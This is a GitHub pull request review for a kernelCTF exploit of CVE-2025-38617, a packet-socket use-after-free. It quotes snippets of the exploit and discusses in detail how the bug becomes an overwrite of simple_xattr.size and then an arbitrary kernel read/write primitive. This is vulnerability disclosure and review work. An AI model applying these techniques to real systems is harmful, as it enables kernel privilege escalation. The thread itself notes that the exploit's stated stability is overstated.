Add kernelCTF CVE-2025-38617_mitigation_cos #339
quanggle97 wants to merge 36 commits into google:master
@koczkatamas Pull request is ready for review.
koczkatamas left a comment:
Hey!
Your exploit code and writeup are very long, and although they explain a lot of details, they are very hard to follow and it is difficult to get a quick understanding of what exactly is happening.
So I have a few questions:
Q1. Which kernel structures (struct XXX within the kernel source) are freed and then used due to the UAF? Which fields of those objects are relevant for the exploitation?
Q2. What object did you spray in pages_order2_read_primitive to allocate in the space of the UAF'd object from Q1?
Q3. My understanding is that you can overwrite the size field of a simple_xattr structure via the original vulnerability in pages_order2_read_primitive.
Let's say simple_xattr looks like this:
struct simple_xattr {
    struct rb_node rb_node;   /*     0    24 */
    char *         name;      /*    24     8 */
    size_t         size;      /*    32     8 */
    char           value[];   /*    40     0 */
};
What is the effect of the vulnerability you are using? Out-of-bounds write of 8 bytes? How / where in the source code exactly do you set the right offset (the offset of the size field)? What cache (in case of SLAB) or order of pages (in case of BUDDY) are you writing from to which cache/pages?
Where do you set the length of the write? (Is it filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);?)
If you'd like to overwrite only 8 bytes, why don't you send an 8-byte-long packet? To get into the right cache?
Are the other fields (like rb_node, name, or value) overwritten, or does your primitive allow a precise 8-byte overwrite of only the size field?
What other constraints do you have for this primitive? Can you choose any offset and size, or are there any restrictions?
Q4. From which field of which object do you leak leaked_content_simple_xattr_kernel_address?
Do I understand correctly that you reuse the original OOB overwrite primitive to overwrite a pgv[] order-2 page to be able to mmap the address of the leaked_content_simple_xattr and modify its values to get the simple_xattr_read_write primitive?
Which fields do you use for the RW purpose? name or value+size? Where in the source code are these fields set?
Q5. Why do you need the abr_page_read_write_primitive when you could also RW with the simple_xattr_read_write_primitive?
    rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
    rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
    rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
    rx_ring.tp_sizeof_priv = 16248;
Is this the place where you adjust the offset to be written? How do you calculate this offset exactly? Please use struct sizes and field offsets in the calculation so that it is clear how this works.
Q1: The ring buffer is freed (represented by struct pgv, which is basically an array of kernel pointers).
Q2: Another ring buffer is used for reclamation.
Q3: The vuln allows me to perform an OOB write with controlled size and controlled offset. I think I described how the exploit controls the offset in the UAF section. The packet is allocated in packet_sendmsg_spkt(), which has a check inside dev_validate_header() that doesn't allow a packet of 8 bytes in length. I specifically chose to overwrite only the size field. I could build a generic page overflow primitive, but I decided to just pick the numbers that fit my strategy.
Q4: Yes.
Q5: The simple_xattr_read_write_primitive only allows us to read/write that struct simple_xattr object, not arbitrary (abr) read/write. I just want to keep the simple_xattr_read_write_primitive alive. If we free that struct simple_xattr object, what if we fail to reclaim it with something we want?
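For the offset calculation requested above, the following is a hedged reconstruction rather than the author's own derivation. It assumes an x86-64 kernel with 4 KiB pages, a SOCK_RAW receive socket, a 14-byte Ethernet header on the dummy interface, and the struct sizes listed in the comments (taken from the UAPI packet headers). Under those assumptions, tp_sizeof_priv = 16248 places the first frame 88 bytes before the end of an order-2 buffer, and packet_reserve shifts the copied packet data to a field offset inside the following order-2 page. All helper and macro names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed x86-64 values; none of these names come from the PR. */
#define ALIGN_UP(x, a)          (((size_t)(x) + (a) - 1) & ~((size_t)(a) - 1))
#define ASSUMED_PAGE_SIZE       4096u
#define ASSUMED_ORDER2_SIZE     ((size_t)ASSUMED_PAGE_SIZE << 2) /* 16384 */
#define ASSUMED_BLOCK_DESC_SIZE 48u /* sizeof(struct tpacket_block_desc) */
#define ASSUMED_TP3_HDR_SIZE    48u /* sizeof(struct tpacket3_hdr) */
#define ASSUMED_SOCKADDR_LL     20u /* sizeof(struct sockaddr_ll) */
#define ASSUMED_TPACKET_ALIGN   16u /* TPACKET_ALIGNMENT */
#define ASSUMED_ETH_HLEN        14u /* MAC header length on an Ethernet-like device */

/* Offset of the first frame in a TPACKET_V3 block: aligned block header plus
 * the aligned private area requested via tp_sizeof_priv. */
static size_t first_frame_offset(size_t sizeof_priv)
{
    return ALIGN_UP(ASSUMED_BLOCK_DESC_SIZE, 8) + ALIGN_UP(sizeof_priv, 8);
}

/* Offset of the copied packet bytes inside a frame, following the SOCK_RAW
 * path of tpacket_rcv(): netoff is aligned, then tp_reserve is added. */
static size_t mac_offset(size_t reserve, size_t maclen)
{
    size_t hdrlen = ALIGN_UP(ASSUMED_TP3_HDR_SIZE, ASSUMED_TPACKET_ALIGN)
                    + ASSUMED_SOCKADDR_LL;                 /* 68 */
    size_t netoff = ALIGN_UP(hdrlen + (maclen < 16 ? 16 : maclen),
                             ASSUMED_TPACKET_ALIGN) + reserve;
    return netoff - maclen;
}

/* Where the packet bytes land relative to the start of the page that follows
 * an order-2 reclamation buffer. */
static size_t write_offset_past_order2(size_t sizeof_priv, size_t reserve)
{
    return first_frame_offset(sizeof_priv)
           + mac_offset(reserve, ASSUMED_ETH_HLEN)
           - ASSUMED_ORDER2_SIZE;
}
```

With these assumptions, write_offset_past_order2(16248, 38) evaluates to 32 and write_offset_past_order2(16248, 30) to 24, which lines up with the size field offsets discussed in this thread. If the socket type or MAC header length differs, the numbers change.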
Hey!
A few followup questions / requests:
Q1) Why is packet_reserve = 38 in mitigation and packet_reserve = 30 in the COS version, what's the difference between the two versions (field offsets, source code differences)?
Q2) IIUC first you overwrite simple_xattr.size at offset 32 (in pages_order2_read_primitive_init), and then pgv[0].buffer at offset 0 (in simple_xattr_read_write_primitive_init), but both functions use tp_sizeof_priv = 16248 and packet_reserve = 38 (in mitigation). What am I missing, where is the 32 bytes difference that you overwrite different offsets with the seemingly same parameters?
Q3) So IIUC you can read/write arbitrary address with simple_xattr_read_write_primitive too but simple_xattr requires spraying the object again and this process can fail (unreliable), so you created abr_page_read_write_primitive which is a stable ARB read/write primitive. Is my understanding correct or are there other differences?
Q1: Because the struct simple_xattr layout differs between COS and mitigation (one uses a linked list and the other uses a red-black tree).
Q2: I overwrite pgv + X, where X is the same offset as the size field in struct simple_xattr. Overwriting pgv[0] is possible too, but since the difference doesn't matter, I decided to keep the offset the same.
Q3: Yes. We need to win the race twice to reach this point, and I don't want to lose that strong primitive, so I tried to design the rest of the exploit flow so that it cannot fail.
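To make the layout difference in Q1 concrete, here is a small sketch using userspace stand-ins for the two struct simple_xattr variants. The mirror types are assumptions (LP64, three machine words for rb_node, two pointers for list_head), and the list-based layout is my recollection of older kernels rather than something quoted in this thread. The red-black tree variant matches the layout quoted in the review for mitigation, so by elimination the list variant would be the COS one.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace stand-ins for kernel types (LP64 assumed); hypothetical names. */
struct rb_node_mirror   { unsigned long parent_color; void *right; void *left; };
struct list_head_mirror { void *next; void *prev; };

/* Red-black tree variant, as quoted by the reviewer. */
struct simple_xattr_rbtree {
    struct rb_node_mirror rb_node;
    char *name;
    size_t size;
    char value[];
};

/* Linked-list variant (assumed layout of the older struct). */
struct simple_xattr_list {
    struct list_head_mirror list;
    char *name;
    size_t size;
    char value[];
};

static size_t size_offset_rbtree(void)
{
    return offsetof(struct simple_xattr_rbtree, size);
}

static size_t size_offset_list(void)
{
    return offsetof(struct simple_xattr_list, size);
}
```

On an LP64 target the two offsets are 32 and 24, an 8-byte gap that equals the difference between packet_reserve = 38 and packet_reserve = 30.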
    struct tpacket_req3 tx_ring = {};
    tx_ring.tp_block_size = PAGES_ORDER1_SIZE;
    tx_ring.tp_block_nr = 1;
    tx_ring.tp_frame_size = PAGES_ORDER1_SIZE;
    tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr;

    struct tpacket_req3 rx_ring = {};
    rx_ring.tp_block_size = PAGES_ORDER3_SIZE;
    rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
    rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
    rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
    rx_ring.tp_sizeof_priv = 16248;
    rx_ring.tp_retire_blk_tov = USHRT_MAX;

    struct sock_filter filter[MAX_FILTER_LEN] = {};
    for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
        filter[i].code = BPF_LD | BPF_IMM;
        filter[i].k = 0xcafebabe;
    }

    filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
    filter[MAX_FILTER_LEN - 1].k = sizeof(void *);

    primitive->victim_packet_socket_config = victim_packet_socket_config_create(
        (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo
        (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr
        tx_ring, // tx_ring
        rx_ring, // rx_ring
        1, // packet_loss
        TPACKET_V3, // packet_version
        30, // packet_reserve
        filter // filter
    );
Significant code duplication for setting up packet socket configuration rings and BPF filters.
Recommendation: Extract the common packet socket configuration logic into a dedicated utility function.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
    primitive->victim_packet_socket_config = util_create_shared_packet_socket_config();
Read more about this violation in the 'Code duplication' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
As I commented above, I don't build a generic page overflow primitive. Part of the packet socket configuration is used to build that page overflow primitive. For example, if I want to perform a PAGES_ORDER3_SIZE overflow, I will choose a victim ring buffer with buffer size PAGES_ORDER4_SIZE and a reclamation ring buffer with buffer size PAGES_ORDER3_SIZE. packet_reserve can be modified to affect the overwrite offset too. I think I described these in the UAF section.
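The sizing rule in the reply above can be read as simple arithmetic: the stale ring configuration still believes each block has the victim's size, so it can reach past the smaller reclaimed buffer by the difference between the two. A minimal sketch of that reading, assuming 4 KiB pages; pages_order_size and overflow_span are hypothetical helpers, not functions from the exploit:

```c
#include <assert.h>
#include <stddef.h>

#define ASSUMED_PAGE_SIZE 4096u /* assumption: 4 KiB base pages */

/* Size in bytes of a buddy allocation of the given order. */
static size_t pages_order_size(unsigned order)
{
    return (size_t)ASSUMED_PAGE_SIZE << order;
}

/* Number of bytes by which a block sized for victim_order extends beyond
 * a buffer that was actually allocated at reclaim_order. */
static size_t overflow_span(unsigned victim_order, unsigned reclaim_order)
{
    assert(victim_order > reclaim_order);
    return pages_order_size(victim_order) - pages_order_size(reclaim_order);
}
```

For the example in the reply, overflow_span(4, 3) equals pages_order_size(3), i.e. a PAGES_ORDER3_SIZE overflow. The configuration quoted in this review (order-3 blocks against an order-2 reclamation buffer) would give a 16384-byte reach under the same reading.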
    alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE);
    void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0);
    void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);
Variable name mem1 is too generic and similar to mem.
Recommendation: Use a descriptive name representing the specific mapping, such as fake_xattr_mem.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
    void *fake_xattr_mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);
Read more about this violation in the 'Naming conventions' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
At that point, these addresses are freed and the expectation is that a struct pgv object successfully reclaims one of them. I kept the names mem and mem1 to reflect that, at this point, the exploit still does not know what is actually at these addresses.
bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive)
{
    void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive);
Too generic variable name 'tmp' used for primitive output.
Recommendation: Rename the variable to reflect its contents, such as leaked_data.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
    void *leaked_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive);
Read more about this violation in the 'Naming conventions' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
    if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) {
        pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = next;
        pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
    } else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) {
        pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = prev;
        pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
    }
Logic to set kernel address variables is duplicated verbatim across if/else blocks.
Recommendation: Refactor the logic to determine the valid address first, then assign the variables in a single shared block.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
    u64 valid_addr = ((next & (PAGES_ORDER2_SIZE - 1)) == 0) ? next : prev;
    pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = valid_addr;
    pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = valid_addr + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
Read more about this violation in the 'Code duplication' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
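Note that the ternary in the suggestion above falls through to prev even when neither pointer is order-2 aligned, whereas the original if/else assigns nothing in that case. A minimal sketch of a deduplicated version that keeps the original behaviour follows. The names resolve_leak and struct leak_result, and the 4 KiB page size, are assumptions for illustration and are not code from the PR.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define ASSUMED_PAGE_SIZE 4096u
#define PAGES_ORDER2_SIZE ((uint64_t)ASSUMED_PAGE_SIZE << 2)

/* Hypothetical container for the two addresses the original code stores. */
struct leak_result {
    uint64_t overflowed_addr;
    uint64_t leaked_content_addr;
};

static bool is_order2_aligned(uint64_t addr)
{
    return (addr & (PAGES_ORDER2_SIZE - 1)) == 0;
}

/* Pick whichever neighbour pointer is order-2 aligned (next takes priority,
 * as in the original), then derive both addresses in one place.
 * Returns false and leaves *out untouched if neither pointer qualifies. */
static bool resolve_leak(uint64_t next, uint64_t prev, unsigned idx,
                         struct leak_result *out)
{
    uint64_t base;

    if (is_order2_aligned(next))
        base = next;
    else if (is_order2_aligned(prev))
        base = prev;
    else
        return false;

    out->overflowed_addr = base;
    out->leaked_content_addr = base + ((uint64_t)idx + 1) * PAGES_ORDER2_SIZE;
    return true;
}
```

A caller can check the return value and retry or bail out instead of silently continuing with an unaligned address.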
    rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
    rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
    rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
    rx_ring.tp_sizeof_priv = 16248;
Usage of an unexplained magic number.
Recommendation: Replace the magic number with a descriptive macro or add an explanatory comment.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
    rx_ring.tp_sizeof_priv = TPACKET_SIZEOF_PRIV_VALUE; /* 16248 */
Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
Again, I don't build a generic page overflow function. If I had to use a descriptive macro, it would look like TPACKET_SIZEOF_PRIV_VALUE_TO_KEEP_THE_UNCONTROLLED_WRITE_DATA_NEAR_THE_END_OF_RECLAMATION_BUFFER_FROM_RING_BUFFER ...
    struct sock_filter filter[MAX_FILTER_LEN] = {};
    for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
        filter[i].code = BPF_LD | BPF_IMM;
        filter[i].k = 0xcafebabe;
Unexplained magic number used in BPF filter.
Recommendation: Define the magic number as a macro or document its irrelevance.
AI-suggested fix (do not apply blindly, but can be helpful for inspiration):
    filter[i].k = BPF_PLACEHOLDER_VALUE; /* 0xcafebabe */
Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.
This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.
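On the question of whether the constant matters: in classic BPF, BPF_LD | BPF_IMM only loads k into the accumulator, and a final BPF_RET | BPF_K returns its own constant regardless of the accumulator, so the padding value has no effect on the result. The return value is the number of packet bytes the socket keeps, which is how the last instruction bounds the length of the copy. A hedged sketch of the same filter shape; build_truncating_filter and effective_snaplen are hypothetical helpers, and the length n stands in for MAX_FILTER_LEN, whose value is not shown in this thread:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <linux/filter.h>

/* Fill f[0..n-2] with accumulator loads of an arbitrary immediate and end
 * with "return keep_bytes". The immediate never influences the result. */
static void build_truncating_filter(struct sock_filter *f, size_t n,
                                    uint32_t keep_bytes)
{
    assert(n >= 1);
    for (size_t i = 0; i + 1 < n; i++) {
        f[i] = (struct sock_filter){ .code = BPF_LD | BPF_IMM,
                                     .k = 0xcafebabe /* arbitrary padding */ };
    }
    f[n - 1] = (struct sock_filter){ .code = BPF_RET | BPF_K,
                                     .k = keep_bytes };
}

/* The receive path keeps min(packet length, filter return value) bytes;
 * a return value of 0 means the packet is dropped. */
static uint32_t effective_snaplen(uint32_t packet_len, uint32_t filter_ret)
{
    return packet_len < filter_ret ? packet_len : filter_ret;
}
```

With keep_bytes = sizeof(void *), a longer packet is truncated to 8 bytes on a 64-bit target, matching the 8-byte overwrite discussed earlier in the review.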
I tried to execute it locally on both mitigation-v4-6.6 and cos-109-17800.519.4, and it gets stuck in pages_order2_read_primitive_build. Any idea why? Is the race failing? Is it related to this change? I saw you modified this:
It also seems that the exploit does not have a 100% success rate as stated in the "stability_notes". Most of the time it causes a kernel NULL pointer dereference bug, which contradicts what you said in your blog - that it can be deterministic.
@wizkernel: The pull request check script kills the run automatically if no flag is output within 60 seconds, so I had to tune the interrupt amplitude to make it good enough to win the race within 60 seconds. Although there is a way to detect whether tpacket_rcv() was hit and whether the interrupt hit, doing so prevents the exploit from finishing in time. The NULL pointer dereference usually happens on the non-mitigation instance because I developed the exploit for the mitigation instance first and ported it to the other instance later. The stability_notes are just for reference; I usually copy them from an old file and modify the necessary fields. But I'm pretty sure that if you have the correct local interrupt amplitude, or modify the code locally to loop over a range of interrupt amplitudes, the mitigation exploit's success rate is around 90% to 100% (again, it usually takes more than 60 seconds).
@wizkernel The blog post describes the exploit flow optimized for the mitigation instance. For the non-mitigation instance, there should be other choices for reclaiming the UAF object because there is no heap hardening. Back then, I submitted the flag for the LTS instance too but could not win the slot (the last slot before userns was disabled). Therefore, I didn't even try to write another version optimized for the non-mitigation instance (COS just needs 10% stability).